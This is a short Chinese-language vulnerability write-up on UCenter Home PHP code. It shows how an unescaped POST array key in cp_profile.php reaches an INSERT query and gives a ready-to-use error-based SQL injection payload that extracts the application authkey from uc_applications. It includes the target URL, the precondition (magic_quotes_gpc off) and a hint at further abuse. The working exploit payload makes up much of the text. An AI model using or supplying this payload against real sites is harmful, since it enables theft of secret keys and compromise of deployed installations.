function_common.php
//SQL ADDSLASHES
function saddslashes($string) {
if(is_array($string)) {
foreach($string as $key => $val) {
$string[$key] = saddslashes($val); //只过滤参数值
}
} else {
$string = addslashes($string);
}
return $string;
}
cp_profile.php 大约56行
//隐私
$inserts = array();
foreach ($_POST['friend'] as $key => $value) {
$value = intval($value);
$inserts[] = "('base','$key','$space[uid]','$value')"; //$key 未没过滤
}
if($inserts) {
$_SGLOBAL['db']->query("DELETE FROM ".tname('spaceinfo')." WHERE uid='$space[uid]' AND type='base'");
$_SGLOBAL['db']->query("INSERT INTO ".tname('spaceinfo')." (type,subtype,uid,friend)
VALUES ".implode(',', $inserts)); //这里出现注入漏洞
}
Exploit:
要求: magic_quote_gpc off
URL: cp.php?ac=profile&op=base
保存时创建一个POST,参数名为:
friend[a',(select 1 from(select count(*),concat((Select concat(substring(authkey,1,64)) FROM uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a),'1')#]
参数值: 随意
这里我使用火狐的tamper实时添加POST
得到 uchome的 authkey
然后你懂的
